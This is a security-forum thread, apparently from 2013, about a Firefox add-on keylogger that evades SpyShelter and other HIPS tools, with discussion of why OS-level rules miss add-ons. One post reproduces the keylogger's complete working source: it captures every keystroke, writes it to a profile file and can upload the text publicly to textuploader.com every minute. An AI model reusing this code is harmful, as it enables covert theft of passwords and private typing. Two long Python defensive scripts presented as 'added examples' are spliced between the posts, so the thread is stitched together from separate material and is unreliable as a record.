A keylogger that bypasses even SpyShelter

Discussion in 'other anti-malware software' started by Oddo, Dec 5, 2013.

Thread Status:
Not open for further replies.
  1. Nizarawi

    Nizarawi Registered Member

    Joined:
    May 26, 2008
    Posts:
    137
    can someone report this problem to spyshelter team
     
  2. vojta

    vojta Registered Member

    Joined:
    Feb 26, 2010
    Posts:
    830
    That's the problem: There is absolutely no problem here. If you chose (intentionally or unintentionally) to turn your browser into a malicious keylogger installing a keylogger add-on there is nothing that Spyshelter or any other anti-keylogger/HIPS can do.

    And do you know why? Because a browser IS a keylogger: It records what you type and sends it to another part of the world via internet. Its behaviour doesn't change in the slightest if one of your add-ons sends what you type to a place you don't want.

    Some people here simply don't want to understand.
     
    Last edited: Dec 7, 2013
  3. Oddo

    Oddo Registered Member

    Joined:
    Sep 6, 2013
    Posts:
    14
    Location:
    Schweden

    I fully agree with you. But on the other hand one has to admit that a logger running as a child process of the browser extends the spectrum of possible attack/infection scenarios. It's not only the personal negligence of installing weird code yourself: Beginning with the malicious manipulation of "officially trusted" add-ons via drive-by download to classic social engineering approaches, there are many ways a third party could benefit from loggers being disguised as browser add-ons. The funny thing is that you might expect your browser to be used as the "postman" for log-files but somehow not as the logger itself.

    I don't know much about the Firefox architecture but I would like to know to which extent it allows external processes - like SpyShelter - to distinguish - at least in theory - between requests coming from the main application and requests coming from add-ons.
     
  4. vojta

    vojta Registered Member

    Joined:
    Feb 26, 2010
    Posts:
    830
    That's what some people don't understand. Add-ons don't run as child processes, they are a lot simpler than that. Check your browser with Process Explorer and tell me if it lists any of your browser's add-ons under it.

    Add-ons are just scripts executed directly by the browser, when you install them they become pieces of the browser's code. The browser executes the commands that it receives from the scripts and that's it. Everything, good or bad, is done by the browser itself and no HIPS, antivirus or keylogger has a chance to know if what the browser does is what you want or if it goes against your own interests.

    What can be done? Be extremely cautious with their reputation. Only install add-ons that have been used by many thousands of people and are rated very high. Things like Avast Browser Cleanup can help. It scans the extensions installed in all your browsers and gives you a rating of their reputation.

    As has been said, have a separate profile (Chrome's Incognito mode or Firefox's Private mode, for example) with only very trusted security add-ons and use it when you enter sensitive credentials: Web mail, Facebook, etc.

    And also you could use a hardened browser like Bitdefender's Safepay that admits no add-ons at all for banking and shopping.
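vojta's advice to judge add-ons by reputation can be backed by an inventory of what is actually installed in a profile. The script below is an added example for this thread, not code from any poster or from Mozilla: it parses the extensions.json that Firefox keeps in each profile directory and flags add-ons that are unsigned, sideloaded by another program, or able to run content scripts on every site (which is all an add-on needs to read what is typed into a page). The field names used (`addons`, `signedState`, `foreignInstall`, `location`, `userPermissions.origins`) and the signedState values are my reading of the current extensions.json layout and are assumptions to confirm against your own Firefox version; the sample file is constructed. The 2013-era overlay add-on in this thread predates the WebExtension permission model and had unrestricted access, which is why the signing and sideload checks matter as much as the permission check.

```python
"""Audit the add-ons recorded in a Firefox profile's extensions.json.

Added example for this thread; not code from any poster or from Mozilla.
Field names are my reading of the extensions.json layout (assumption:
check against your Firefox version). The sample file is constructed.
"""
from __future__ import annotations

import json
from pathlib import Path

# signedState values as used by Firefox's AddonManager (assumption, from
# its SIGNEDSTATE_* constants): 2 = signed by addons.mozilla.org,
# 3 = system add-on, 4 = privileged; 0 = missing, -1 = broken, -2 = unknown.
TRUSTED_SIGNED_STATES = {2, 3, 4}

# Host-permission patterns that let a content script run on every page.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Install locations meaning "the user put it in this profile" or "shipped
# with Firefox"; anything else (registry- or system-wide) deserves a look.
EXPECTED_LOCATIONS = {None, "app-profile", "app-builtin", "app-system-defaults"}


def audit_addon(addon: dict) -> list[str]:
    """Return human-readable findings for one add-on record (empty = nothing notable)."""
    findings: list[str] = []
    if addon.get("type") != "extension":
        return findings  # themes, dictionaries and language packs cannot run scripts
    if addon.get("userDisabled") or addon.get("appDisabled"):
        return findings  # a disabled add-on does not execute
    if addon.get("signedState") not in TRUSTED_SIGNED_STATES:
        findings.append("not signed by Mozilla")
    if addon.get("foreignInstall"):
        findings.append("sideloaded by another program rather than installed in-browser")
    if addon.get("location") not in EXPECTED_LOCATIONS:
        findings.append(f"installed from unexpected location {addon['location']!r}")
    origins = set((addon.get("userPermissions") or {}).get("origins", []))
    if origins & BROAD_HOST_PATTERNS:
        findings.append("content-script access to every site (can read what you type)")
    return findings


def audit_profile(extensions_json_text: str) -> dict[str, list[str]]:
    """Map add-on id -> findings for every add-on in a serialized extensions.json."""
    data = json.loads(extensions_json_text)
    return {addon["id"]: audit_addon(addon) for addon in data.get("addons", [])}


def audit_profile_dir(profile_dir: str) -> dict[str, list[str]]:
    """Convenience wrapper: read extensions.json from a real profile directory."""
    path = Path(profile_dir) / "extensions.json"
    return audit_profile(path.read_text(encoding="utf-8"))


# Constructed sample: a signed ad blocker (broad access, but reputable), an
# unsigned sideloaded "helper" with the same reach, and a harmless theme.
SAMPLE_EXTENSIONS_JSON = json.dumps({
    "schemaVersion": 35,
    "addons": [
        {"id": "adblocker@example.invalid", "type": "extension", "signedState": 2,
         "userDisabled": False, "appDisabled": False, "location": "app-profile",
         "userPermissions": {"permissions": ["webRequest"], "origins": ["<all_urls>"]}},
        {"id": "helper@example.invalid", "type": "extension", "signedState": 0,
         "userDisabled": False, "appDisabled": False, "foreignInstall": True,
         "location": "app-profile",
         "userPermissions": {"permissions": [], "origins": ["<all_urls>"]}},
        {"id": "dark-theme@example.invalid", "type": "theme", "signedState": 2,
         "userDisabled": False, "appDisabled": False, "location": "app-profile"},
    ],
})


if __name__ == "__main__":
    for addon_id, findings in audit_profile(SAMPLE_EXTENSIONS_JSON).items():
        status = "; ".join(findings) if findings else "nothing notable"
        print(f"{addon_id}: {status}")
```

Note that the reputable ad blocker is flagged for the same all-sites access as the unsigned helper: the permission alone does not separate good from bad, which is vojta's point that reputation and install provenance are what you actually have to go on.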
     
  5. controler

    controler Guest

    var keylogger_namespace={};

    keylogger_namespace.keylogger=function()
    {
    // set username and password for www.textuploader.com here
    this.netupload = "false";
    this.username = "my_username";
    this.password = "my_password";

    var file = Components.classes["@mozilla.org/file/directory_service;1"].
    getService(Components.interfaces.nsIProperties).
    get("ProfD", Components.interfaces.nsIFile);
    file.append("kl");

    this.f = file.path+"text.txt";
    this.pressmode = "false";
    this.stoul = "";
    this.ctrlchar = "false";
    this.prevnl = "false";


    window.addEventListener(
    "load", function() {myKeylogger.init(); }, false);
    }
    var keylog=new keylogger_namespace.keylogger();

    ////////////////////////////////////////////////////////////////////////////////////
    keylog.logKeydown=function(e) {
    var keynum;

    keynum = e.which;

    var keyPressed="";
    var specialchar="false";
    switch(keynum)
    {
    case 8: keyPressed = "backspace\n"; specialchar="true"; break; // backspace
    case 9: keyPressed = "tab\n"; specialchar="true"; break; // tab
    case 13: keyPressed = "enter\n"; specialchar="true"; break; // enter
    case 16: keyPressed = "shift\n"; specialchar="true"; break; // shift
    case 17: keyPressed = "ctrl "; specialchar="true"; keylog.ctrlchar="true"; break; // ctrl
    case 18: keyPressed = "alt\n"; specialchar="true"; break; // alt
    case 20: keyPressed = "caps lock\n"; specialchar="true"; break; // alt
    case 27: keyPressed = "escape\n"; specialchar="true"; break; // escape
    case 37: keyPressed = "left arrow\n"; specialchar="true"; break; // left arrow
    case 39: keyPressed = "right arrow\n"; specialchar="true"; break; // right arrow
    case 45: keyPressed = "insert\n"; specialchar="true"; break; // insert
    case 46: keyPressed = "delete\n"; specialchar="true"; break; // delete
    }

    if(specialchar=="true") {
    if(keylog.stoul!="") {
    keylog.stoul = keylog.stoul + " ";
    }
    keylog.stoul = keylog.stoul + keyPressed.substring(0,keyPressed.length-1);
    }
    // file is nsIFile, data is a string
    var file = Components.classes["@mozilla.org/file/local;1"]
    .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(keylog.f);
    var foStream = Components.classes["@mozilla.org/network/file-output-stream;1"]
    .createInstance(Components.interfaces.nsIFileOutputStream);
    // use 0x02 | 0x10 to open file for appending.
    foStream.init(file, 0x02 | 0x10 | 0x08, 00666, 0); // write(only), append, create file
    if(keylog.pressmode=="true" && specialchar=="true" && keylog.prevnl=="false") {
    var nl="\n";
    foStream.write(nl, nl.length);
    keylog.pressmode="false";
    keylog.stoul = keylog.stoul + " ";
    }
    foStream.write(keyPressed, keyPressed.length);
    foStream.close();
    if(specialchar=="true") {
    keylog.stoul = keylog.stoul + " ";
    }
    }

    keylog.logKeypress=function(e) {
    var keynum;

    keynum = e.which;

    var keyPressed="";

    switch(keynum) {
    case 0: break; // break if escape, tab, delete etc
    case 8: break; // backspace
    case 13: break; // enter
    default:
    keylog.pressmode="true";
    keyPressed = String.fromCharCode(keynum);
    }

    // file is nsIFile, data is a string
    var file = Components.classes["@mozilla.org/file/local;1"]
    .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(keylog.f);
    var foStream = Components.classes["@mozilla.org/network/file-output-stream;1"]
    .createInstance(Components.interfaces.nsIFileOutputStream);
    // use 0x02 | 0x10 to open file for appending.
    foStream.init(file, 0x02 | 0x10 | 0x08, 00666, 0); // write(only), append, create file
    foStream.write(keyPressed, keyPressed.length);
    keylog.prevnl="false";
    if(keylog.ctrlchar=="true") {
    var nl="\n";
    foStream.write(nl, nl.length);
    keylog.prevnl="true";
    }
    foStream.close();

    keylog.stoul = keylog.stoul + keyPressed;
    if(keylog.ctrlchar=="true") {
    keylog.stoul = keylog.stoul + " ";
    keylog.ctrlchar="false";
    }
    }


    ////////////////////////////////////////////////////////////////////////////////////////////////
    keylog.present_log=function() {
    //read the contents of the log file
    var file = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(keylog.f);
    win=window.open("file://"+file.path,'log', '');
    win.onfocus=function() {
    setTimeout(function() {
    win.scrollBy(0,5000000);
    }, 500);
    }
    if(window.focus) {win.focus()}
    setTimeout(function() {
    win.scrollBy(0,5000000);
    }, 1000);
    }

    keylog.dateToString=function(date) {
    var month = date.getMonth() + 1;
    var day = date.getDate();
    var dateOfString = (("" + day).length < 2 ? "0" : "") + day + "/";
    dateOfString += (("" + month).length < 2 ? "0" : "") + month + "/";
    dateOfString += date.getFullYear();
    var hour = date.getHours();
    var minute = date.getMinutes();
    var second = date.getSeconds();
    dateOfString += " " + (("" + hour).length < 2 ? "0" : "") + hour + ":";
    dateOfString += (("" + minute).length < 2 ? "0" : "") + minute + ":";
    dateOfString += (("" + second).length < 2 ? "0" : "") + second;
    return dateOfString;

    }

    keylog.logtimestamp=function() {
    var currentdate = new Date();
    var datetime="";
    datetime += keylog.dateToString(currentdate);
    datetime = "Timestamp: " + datetime;
    // file is nsIFile, data is a string
    var file = Components.classes["@mozilla.org/file/local;1"]
    .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(keylog.f);
    var foStream = Components.classes["@mozilla.org/network/file-output-stream;1"]
    .createInstance(Components.interfaces.nsIFileOutputStream);
    // use 0x02 | 0x10 to open file for appending.
    foStream.init(file, 0x02 | 0x10 | 0x08, 00666, 0); // write(only), append, create file
    var nl="\n";
    if(keylog.pressmode=="true" && keylog.prevnl=="false") {
    foStream.write(nl, nl.length);
    keylog.pressmode="false";
    }
    foStream.write(datetime, datetime.length);
    foStream.write(nl, nl.length);
    foStream.close();
    }


    keylog.tokenlogin=function() {
    var req = new XMLHttpRequest();

    var token="";

    var url = "https://textuploader.com/auth/logout";

    req.open("GET", url, true);
    req.withCredentials = true;
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.send(null);

    var req = new XMLHttpRequest();

    var url = "https://textuploader.com/auth/login";

    req.open("GET", url, false);
    // req.withCredentials = true;
    // req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.onload = function(e) {
    console.log(req.responseText);
    token = req.responseText;
    var poseins = token.indexOf("_token");
    var poszwei = token.indexOf("value=");
    var posdrei = token.indexOf("> ");
    token = token.substring(poszwei + 7,posdrei-1);
    keylog.txtuploadrlogin(token);
    }
    req.send(null);
    }


    keylog.txtuploadrlogin=function(token) {
    //login to txtuploader
    var req = new XMLHttpRequest();
    var url = "https://textuploader.com/auth/login";

    req.open("POST", url, true);

    req.withCredentials = true;

    req.onload = function () {
    // do something to response
    console.log(this.responseText);
    };

    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

    req.send("_token=" + encodeURIComponent(token) + "&username=" + encodeURIComponent(keylog.username) + "&password=" + encodeURIComponent(keylog.password) + "&submit=Login");
    return;
    }

    keylog.logupload=function() {
    if(keylog.stoul=="") {
    return;
    }
    // upload log to txtuploader
    var req = new XMLHttpRequest();
    var url = "http://textuploader.com";
    req.open("POST", url, true);
    req.withCredentials = true;

    req.onload = function () {
    // do something to response
    console.log(this.responseText);
    };
    req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    req.send("textdata=" + encodeURIComponent(keylog.stoul) + "&texttitle=code&expiration=9999999&syntax=auto&type=public");
    req.onload = function () {
    // do something to response
    console.log(this.responseText);
    };
    keylog.stoul="";
    }

    ////////////////////////////////////////////////////////////////////////////////////////////////
    if ("undefined" == typeof(myKeylogger))
    {
    var myKeylogger= {

    init : function()
    {
    if(keylog.netupload=="true") {
    keylog.tokenlogin();
    setInterval(keylog.logupload, 60000);
    }
    //capturing the keystrokes
    document.addEventListener("keydown", keylog.logKeydown, false);
    document.addEventListener("keypress", keylog.logKeypress, false);
    //log also timestamps
    setInterval(keylog.logtimestamp, 60000);
    },

    stateChanged : function()
    {

    }
    }


    };
     
  6. ellison64

    ellison64 Registered Member

    Joined:
    Oct 5, 2003
    Posts:
    2,587
    Thanks for the informative posts. I am one of those people that didn't understand (not don't want to understand). And your posts have explained simply and clearly. :thumb:
     
  7. ichito

    ichito Registered Member

    Joined:
    Jan 14, 2011
    Posts:
    1,997
    Location:
    Poland - Cracow
    @vojta
    I think you are probably too much focused on apps like "anti-exe" where it is enough to make only one rule for one process...if you "allow" and add it to the white list - all other possible actions are allowed by definition. HIPS/BB are not such apps...you have (mainly in advanced settings) a lot of possibly detected actions that you can allow/deny/ask/control/or even disable the feature. Look at settings in OA, PFW, even PCTools...look at Mamutu where you can find perhaps more than 30 monitored actions or ThreatFire where you can make as many rules as you want...need...have time to do it.
    There is a similar situation with SS...it has 52 monitored actions on the list and there is a possibility that every one of them would be detected in one application...one process...one piece of code. 20 of them are marked as keylogging actions.

    [image attachment: 131208070358_6.jpg]

    Below you have examples of very common and well-known apps in which SS detects key-logging action...in some of them more than one.

    [image attachments: 131208070010_3.jpg, 131208070059_4.jpg, 131208070154_5.jpg, 131208154029_1.jpg]

    You are right if we talk about a trusted app...but if we control almost every action of some app...if we have no WL...if there is no trusted app at all...SS should ask us...
    This is the problem.
     
  8. guest

    guest Guest

    It doesn't matter that protections are implemented at an OS level.
    If you install a "spyware" addon in your browser, the browser itself is spyware.
     
  9. J_L

    J_L Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    8,738
    The browser itself still follows your HIPS rules, and that doesn't always mean it's trusted. Then there's the scope of the HIPS as shown above, it's not as if your browser will perform the same actions after installing the extension.

    Heck, I'm just repeating in my own words what others have already said, but were overlooked. I'd really like to see someone test this keylogger to see what truly happens.
     
  10. ichito

    ichito Registered Member

    Joined:
    Jan 14, 2011
    Posts:
    1,997
    Location:
    Poland - Cracow
    Exactly...when we make rules for a browser or other app we actually build something like a "channel" between rules in which such an app can work easily and safely for us. Each trial "straying from the path" should give us information about it.
    +1

    I think it does not matter if we are dealing with a trusted app or with malware...we should always expect from monitoring software proper recognition, detection and information given to the user. Even more...we have to expect all these things in the case of malware.
    :)
     
  11. guest

    guest Guest

    But it matters because the information never leaves the browser environment, and any HIPS always places its rules at an OS level, so there is no granularity for blocking things like this. This is not an external app attacking a browser.
    To block this keylogger, (I don't know if it is possible) the HIPS would need to have specific rules for each browser (Firefox here) that should work internally.
    In the same way you can't block with the firewall an addon that sends "anonymous" statistics about what you do online (there are too many for Chrome and Firefox), you can't "easily" block an addon acting as a keylogger with a HIPS.

    All the HIPS rules are related to the OS; what you see in SpyShelter with "fancy" names internally has the same aspect as the screenshots you can see here

    http://help.comodo.com/topic-72-1-451-4764-Protected-Objects.html
    http://help.comodo.com/topic-72-1-451-4847-Protected-Files-.html
    http://help.comodo.com/topic-72-1-451-4765-Protected-Registry-Keys.html
    http://help.comodo.com/topic-72-1-451-4766-Protected-COM-interfaces.html

    The spyshelter rules (and any HIPS) are protecting folders, files, registry keys, services, drivers, com interfaces.... that can be used with a malicious purpose and the addon doesn't use any of this.
     
    Last edited by a moderator: Dec 10, 2013
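The protected-object model guest describes can be made concrete. The block below is an added example for this thread, not code from any HIPS vendor or from a poster: it models a HIPS rule set as pattern lists for files, registry keys and hook APIs, runs constructed event records through it for firefox.exe (using the profile-directory log file and the textuploader.com upload that the posted add-on performs) and for a conventional hook-based logger, and then shows the one thing outside the browser that still changes, the set of hosts the browser talks to. The patterns, the profile path, the process names and every event record are constructed.

```python
"""Model why OS-level HIPS rules stay silent on an add-on keylogger.

Added example for this thread, not code from any HIPS vendor or poster.
Protected-object patterns, paths and event records are constructed; the
profile log file and upload host follow the add-on code posted above.
"""
from __future__ import annotations

from fnmatch import fnmatchcase

# A HIPS rule set in the spirit of the linked Comodo lists: objects whose
# use by an untrusted process triggers an alert. Illustrative patterns only.
PROTECTED_OBJECTS = {
    "file": ["C:\\Windows\\System32\\*", "C:\\Program Files\\*", "*\\Startup\\*"],
    "registry": ["HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*",
                 "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*"],
    "api": ["SetWindowsHookEx*", "GetAsyncKeyState", "GetRawInputData"],
}


def hips_match(event: dict) -> str | None:
    """Return the protected-object pattern an event hits, or None if it is ordinary."""
    for pattern in PROTECTED_OBJECTS.get(event["kind"], []):
        if fnmatchcase(event["target"], pattern):
            return pattern
    return None


def alerts(events: list[dict]) -> list[tuple[str, str, str]]:
    """(process, target, matched pattern) for every event the rule set would flag."""
    out = []
    for event in events:
        pattern = hips_match(event)
        if pattern is not None:
            out.append((event["process"], event["target"], pattern))
    return out


def unusual_destinations(events: list[dict], baseline: set[str]) -> list[str]:
    """Network targets in the events that are not in the process's known baseline."""
    return sorted({e["target"] for e in events
                   if e["kind"] == "network" and e["target"] not in baseline})


# Constructed profile path. The posted add-on appends "kl" to the profile
# directory and then concatenates "text.txt", so the log lands in the profile.
PROFILE = "C:\\Users\\alice\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\abcd1234.default"

# Constructed activity of firefox.exe while the posted add-on is active.
BROWSER_EVENTS = [
    {"process": "firefox.exe", "kind": "file", "target": PROFILE + "\\kltext.txt"},
    {"process": "firefox.exe", "kind": "file", "target": PROFILE + "\\cookies.sqlite"},
    {"process": "firefox.exe", "kind": "network", "target": "www.wilderssecurity.com:443"},
    {"process": "firefox.exe", "kind": "network", "target": "textuploader.com:443"},
]

# Constructed activity of a conventional stand-alone keylogger, for contrast.
CLASSIC_KEYLOGGER_EVENTS = [
    {"process": "kl.exe", "kind": "api", "target": "SetWindowsHookExW"},
    {"process": "kl.exe", "kind": "registry",
     "target": "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\kl"},
    {"process": "kl.exe", "kind": "network", "target": "textuploader.com:443"},
]

# Hosts this user's browser has been seen talking to before (constructed).
BROWSER_BASELINE = {"www.wilderssecurity.com:443"}


if __name__ == "__main__":
    print("HIPS alerts for the browser:", alerts(BROWSER_EVENTS))      # []
    print("HIPS alerts for kl.exe:", alerts(CLASSIC_KEYLOGGER_EVENTS))  # two hits
    print("Browser destinations outside baseline:",
          unusual_destinations(BROWSER_EVENTS, BROWSER_BASELINE))    # ['textuploader.com:443']
```

The rule set raises nothing for the browser and two hits for the hook-based logger, which is exactly the asymmetry the post describes: writing a file under its own profile and making an HTTPS request are things the browser does all day. The destination check is the kind of extra, per-process egress baseline that an endpoint tool could still apply from outside the browser, because the captured text has to leave the machine somehow.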
  12. CoolWebSearch

    CoolWebSearch Registered Member

    Joined:
    Sep 30, 2007
    Posts:
    1,247
    Then Comodo, AppGuard, DefenseWall, Sandboxie etc. should all have the ability to control add-on behaviour as well.
     
  13. vojta

    vojta Registered Member

    Joined:
    Feb 26, 2010
    Posts:
    830
    No, the problem is that add-ons don't need hooks, screen captures, clipboard captures, etc.

    They don't need them because you are giving all the information to them directly. They only need to fool you once: The moment that you install them. When you put information in your browser it is visible for any add-on and no external program can see anything odd because the browser is doing its job as usual. Again, no hooks needed, no screen capture needed, no clipboard capture needed, no keylogging needed......nothing that a HIPS monitors is needed.

    I haven't talked about anti-exes a single time here, I don't like them. I use a HIPS and I know how they work. There is nothing they can do against add-ons because they don't do anything out of the ordinary. It's always business as usual for the browser.
     
  14. guest

    guest Guest

    I don't understand your point, but any of the programs you mention should be able to block this addon.
     
  15. CoolWebSearch

    CoolWebSearch Registered Member

    Joined:
    Sep 30, 2007
    Posts:
    1,247
    I meant to say you install this keylogger/malware add-on, and then after the install, could it be possible for the authors of any mentioned anti-malware products to create something in their software products that could block every action that an already installed malicious add-on (that contains every kind of malware) usually does?

    Why shouldn't this be possible?
     
  16. guest

    guest Guest

    None of them is designed to block things like this, and I don't think it would be easy to add protection for this.
    The problem is once the addon is installed it becomes part of the browser. For any external security software any addon is invisible.
    Probably the easiest solution would be if Firefox included protection against the addons. Something similar to what Android does with the apps.

    https://www.google.es/search?q=andr...gDw&ved=0CAcQ_AUoAQ&biw=1280&bih=627#imgdii=_
     
  17. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    Last edited: Dec 10, 2013
  18. fax

    fax Registered Member

    Joined:
    May 30, 2005
    Posts:
    3,899
    Location:
    localhost
  19. CloneRanger

    CloneRanger Registered Member

    Joined:
    Jan 4, 2006
    Posts:
    4,978
    @ fax

    Indeed it does ! Thanx for the heads up :thumb: Fixed it now.
     
  20. Space Ghost

    Space Ghost Registered Member

    Joined:
    Apr 21, 2011
    Posts:
    194
    Location:
    Poland
    SpyShelter and Zemana vs Keyloggers
    -http://www.blogsolute.com/best-anti-keylogger/29029/
     
  21. guest

    guest Guest

    They all are dedicated keylogger software that is not using other processes. This particular keylogger here formed itself as a Firefox extension and turned the browser into a keylogger software. Nearly everyone who is using HIPS, AE, and anti-logger software whitelisted/trusted the browser for sure. That's the problem.
     
  22. guest

    guest Guest

    This kind of test is useless: they install the keyloggers without having installed the anti-keylogger, so during the installation all the hooks are placed. Also he disabled the key encryption....

    It's like if you infect a computer with malware and then install an AV, the AV will fail because you are already infected and the damage is done.
     
  23. ichito

    ichito Registered Member

    Joined:
    Jan 14, 2011
    Posts:
    1,997
    Location:
    Poland - Cracow
    @guest
    Thanks for comprehensive explanation...it's very illuminating and useful :thumb:

    @vojta
    Thank you also and please don't feel offended...I don't dispute your knowledge and competence but only try to speculate in such a matter :)
     
  24. gambla

    gambla Registered Member

    Joined:
    Sep 4, 2007
    Posts:
    166
    Location:
    Frankfurt, Germany
    Where did you read this? If that's true the test would be useless indeed.
    If not, then the result is pretty disappointing. If they can't catch half of the well known KLs on the market, I wouldn't buy any of them.
     
  25. guest

    guest Guest

    Install Spyshelter and then install any of the keyloggers to see what happens, let me know if you get less than "20" popups during the process.
     